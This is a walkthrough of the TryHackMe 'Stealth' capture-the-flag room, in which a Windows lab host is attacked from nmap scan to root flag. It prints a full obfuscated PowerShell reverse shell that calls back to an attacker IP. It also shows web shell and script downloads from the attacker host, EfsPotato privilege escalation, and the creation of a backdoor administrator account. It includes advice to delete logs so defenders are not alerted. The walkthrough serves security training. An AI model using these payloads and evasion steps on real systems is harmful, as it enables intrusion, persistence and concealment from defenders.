Stealth || TryHackMe Walkthrough
Running Nmap —
┌──(kali㉿kali)-[/home/thm/stealth]
└─$ sudo nmap -T4 --min-rate 1000 -sC -sV -p- -oN nmap_report 10.10.130.54
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-28 11:27 EST
Nmap scan report for 10.10.130.54
Host is up (0.17s latency).
Not shown: 65520 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=HostEvasion
| Not valid before: 2023-07-28T19:06:15
|_Not valid after: 2024-01-27T19:06:15
|_ssl-date: 2023-11-28T16:32:19+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
8080/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: PowerShell Script Analyser
8443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| tls-alpn:
|_ http/1.1
|_http-title: PowerShell Script Analyser
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open unknown
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49671/tcp open unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
| smb2-time:
| date: 2023-11-28T16:31:43
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not requiredService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 312.84 seconds
Visiting https://10.10.165.36:8443/ —
Uploading the reverse shell file —
PowerShell-reverse-shell/powershell-reverse-shell.ps1 at main · martinsohn/PowerShell-reverse-shell
Reverse TCP shell in PowerShell for fun. Made in spring 2020 with inspiration from (and a few fixes to)…
Note — Start listening on port 13337 to gain a reverse shell
Found a flag at C:\Users\evader\Desktop —
The file.ps1 file in C:\Users\evader\Documents\Task folder indicates that there is a log file present in the C:\xampp\htdocs\uploads
SHELL> dir
Directory: C:\xampp\htdocs\uploads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/1/2023 5:10 PM 132 hello.ps1
-a---- 8/17/2023 4:58 AM 0 index.php
-a---- 11/29/2023 4:55 AM 302 log.txt
-a---- 11/29/2023 4:55 AM 1462 rev.ps1
-a---- 9/4/2023 3:18 PM 771 vulnerable.ps1
Remove the log.txt file immediately after uploading the reverse shell file so that the blue team members won’t be alerted
Inspecting log.txt & vulnerable.ps1 —
SHELL> type log.txt
exe
ps1ps1
ps1
ps1
ps1
ps1
ps1
ps1
--------------------SNIPPED---------------------SHELL> type vulnerable.ps1
Set-Alias -Name K -Value Out-String
Set-Alias -Name nothingHere -Value iex
$BT = New-Object "S`y`stem.Net.Sockets.T`CPCl`ient"('10.10.129.75',1234);
$replace = $BT.GetStream();
[byte[]]$B = 0..(32768*2-1)|%{0};
$B = ([text.encoding]::UTF8).GetBytes("(c) Microsoft Corporation. All rights reserved.`n`n")
----------------------------------SNIPPED----------------------------------------Steps to gain User Flag
- Copy the vulnerable.ps1 file and change the IP and the port as required
- Upload the modified reverse shell
- Delete the log.txt file in the Directory: C:\xampp\htdocs\uploads
###The vulnerable.ps1 file is a reverse shell, modifying the reverse shell file###Using this as a reverse shell (sample.ps1)Set-Alias -Name K -Value Out-String
Set-Alias -Name nothingHere -Value iex
$BT = New-Object "S`y`stem.Net.Sockets.T`CPCl`ient"('10.11.50.160',1234);
$replace = $BT.GetStream();
[byte[]]$B = 0..(32768*2-1)|%{0};
$B = ([text.encoding]::UTF8).GetBytes("(c) Microsoft Corporation. All rights reserved.`n`n")
$replace.Write($B,0,$B.Length)
$B = ([text.encoding]::ASCII).GetBytes((Get-Location).Path + '>')
$replace.Write($B,0,$B.Length)
[byte[]]$int = 0..(10000+55535)|%{0};
while(($i = $replace.Read($int, 0, $int.Length)) -ne 0){;
$ROM = [text.encoding]::ASCII.GetString($int,0, $i);
$I = (nothingHere $ROM 2>&1 | K );
$I2 = $I + (pwd).Path + '> ';
$U = [text.encoding]::ASCII.GetBytes($I2);
$replace.Write($U,0,$U.Length);
$replace.Flush()};
$BT.Close()
Uploading the reverse shell file —
Note — Start listening on port 1234 to get a new reverse shell on the target machine
Gained User Flag —
Uploading PrivescCheck.ps1 —
GitHub — itm4n/PrivescCheck: Privilege Escalation Enumeration Script for Windows
Privilege Escalation Enumeration Script for Windows — GitHub — itm4n/PrivescCheck: Privilege Escalation Enumeration…
C:\Users\evader\Documents> iwr -uri "http://10.11.50.160/PrivescCheck.ps1" -o PrivescCheck.ps1#Executing the script
C:\Users\evader\Documents> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"The Xampp service is being run by the user: evader —
Checking evader’s privileges in the reverse shell session —
C:\Users\evader\Documents> whoami /privPRIVILEGES INFORMATION
----------------------Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Uploading p0wny shell to gain a shell through the Xampp service and the p0wny reverse shell file can be uploaded to C:\xampp\htdocs since it is run by the user evader
GitHub — flozz/p0wny-shell: Single-file PHP shell
Single-file PHP shell. Contribute to flozz/p0wny-shell development by creating an account on GitHub.
C:\Users\evader\Documents> cd C:\xampp\htdocs
C:\xampp\htdocs> iwr -uri "http://10.11.50.160/shell.php" -o shell.php
C:\xampp\htdocs>Visit the URL: http://<ip>:8080/shell.php
Checking the privileges of the user in the p0wny shell —
The user has SeImpersonatePrivilege enabled this can be used as a leverage for privilege escalation
Using Efspotato for privilege escalation —
GitHub — zcgonvh/EfsPotato: Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with…
Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)…
Transferring the file to the target machine —
Compiling the binary —
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe efs.cs -nowarn:1691,618Using the binary to run commands with elevated privileges —
.\efs.exe whoami
-----------Command to create and add user to the net localgroup administrators group
.\efs.exe "cmd.exe /c net user user password@123 /add && net localgroup administrators user /add"Adding user to the Administrators group —
Using the new credentials to login over RDP as ‘user ‘ —
Using Remmina —
Captured Root Flag —
Thank you for reading!
